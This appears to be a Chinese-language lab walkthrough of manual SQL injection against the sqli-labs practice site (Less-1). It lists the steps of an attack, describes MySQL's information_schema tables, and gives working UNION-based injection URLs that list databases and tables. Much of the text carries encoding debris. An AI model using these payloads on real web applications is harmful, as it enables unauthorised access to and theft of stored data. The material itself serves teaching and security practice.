手工注入常規(guī)思路
1.判斷是否存在注入,注入是字符型還是數(shù)字型
2.猜解 SQL 查詢語句中的字段數(shù)
3.確定顯示的字段順序
4.獲取當前數(shù)據(jù)庫
5.獲取數(shù)據(jù)庫中的表
6.獲取表中的字段名
7.查詢到賬戶的數(shù)據(jù)
information_schema數(shù)據(jù)庫表說明
SCHEMATA表:提供了當前mysql實例中所有數(shù)據(jù)庫的信息�����。是show databases的結(jié)果取之此表�。
TABLES表:提供了關(guān)于數(shù)據(jù)庫中的表的信息(包括視圖)。詳細表述了某個表屬于哪個schema���,表類型��,表引擎�����,創(chuàng)建時間等信息�����。是show tables from schemaname的結(jié)果取之此表�����。
COLUMNS表:提供了表中的列信息�。詳細表述了某張表的所有列以及每個列的信息。是show columns from schemaname.tablename的結(jié)果取之此表����。
STATISTICS表:提供了關(guān)于表索引的信息。是show index from schemaname.tablename的結(jié)果取之此表�。
USER_PRIVILEGES(用戶權(quán)限)表:給出了關(guān)于全程權(quán)限的信息。該信息源自mysql.user授權(quán)表���。是非標準表��。
SCHEMA_PRIVILEGES(方案權(quán)限)表:給出了關(guān)于方案(數(shù)據(jù)庫)權(quán)限的信息���。該信息來自mysql.db授權(quán)表。是非標準表����。
TABLE_PRIVILEGES(表權(quán)限)表:給出了關(guān)于表權(quán)限的信息。該信息源自mysql.tables_priv授權(quán)表����。是非標準表�。
COLUMN_PRIVILEGES(列權(quán)限)表:給出了關(guān)于列權(quán)限的信息���。該信息源自mysql.columns_priv授權(quán)表。是非標準表�。
CHARACTER_SETS(字符集)表:提供了mysql實例可用字符集的信息。是SHOW CHARACTER SET結(jié)果集取之此表�。
COLLATIONS表:提供了關(guān)于各字符集的對照信息。
COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校對的字符集�。這些列等效于SHOW COLLATION的前兩個顯示字段。
TABLE_CONSTRAINTS表:描述了存在約束的表�。以及表的約束類型。
KEY_COLUMN_USAGE表:描述了具有約束的鍵列�����。
ROUTINES表:提供了關(guān)于存儲子程序(存儲程序和函數(shù))的信息�����。此時�����,ROUTINES表不包含自定義函數(shù)(UDF)。名為“mysql.proc name”的列指明了對應(yīng)于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列����。
VIEWS表:給出了關(guān)于數(shù)據(jù)庫中的視圖的信息。需要有show views權(quán)限�,否則無法查看視圖信息。
TRIGGERS表:提供了關(guān)于觸發(fā)程序的信息�����。必須有super權(quán)限才能查看該表
MySQL GROUP_CONCAT()函數(shù)將組中的字符串連接成為具有各種選項的單個字符串���。
實驗192.168.8.172/sql/
Less-1
GET - Error based - Single quotes - String(基于錯誤的GET單引號字符型注入)
輸入id=1的正常頁面
數(shù)據(jù)庫的注釋用-- (這里有一個空格)�,但是在URL中最后加上-- �����,瀏覽器會把發(fā)送請求末尾的空格去掉��,所有我們用--+代替-- ��,因為+在URL被URL編碼后表示空格����。
先嘗試爆破數(shù)據(jù)庫名�,將ID改為一個數(shù)據(jù)庫不存在的值��,使用union select1�,2,3進行聯(lián)合查詢查看是否有顯示位�����。
頁面返回正常��,因此該注入支持union聯(lián)合查詢注入��。
查詢有那些數(shù)據(jù)庫
http://127.0.0.1/sql/sqli-labs-master/Less-1/?id=qswz%27%20union%20select%201,(select%20group_concat(schema_name)from%20information_schema.schemata),3%20--+
命令解釋:
schema_name 當前數(shù)據(jù)庫
information_schema (數(shù)據(jù)詞典)是MySQL自帶的數(shù)據(jù)庫�,提供了訪問數(shù)據(jù)庫元數(shù)據(jù)的方式(元數(shù)據(jù)是關(guān)于數(shù)據(jù)庫的數(shù)據(jù)���,如數(shù)據(jù)庫名或表名����,列的數(shù)據(jù)類型�,或訪問權(quán)限等)
schemata (information_schema中的一個表):提供了當前MySQL實例中所有數(shù)據(jù)庫的信息。
爆出了數(shù)據(jù)庫
我們查詢一下security數(shù)據(jù)庫有那些表
http://127.0.0.1/sql/sqli-labs-master/Less-1/?id=qswz%27%20union%20select%201,(select%20group_concat(schema_name)from%20information_schema.schemata),(select group_concat(table_name)from information_schema.tables where table_schema='security')%20--+
這是手工注入的����,用sqlmap的話可以快速掃描出來的����。
|
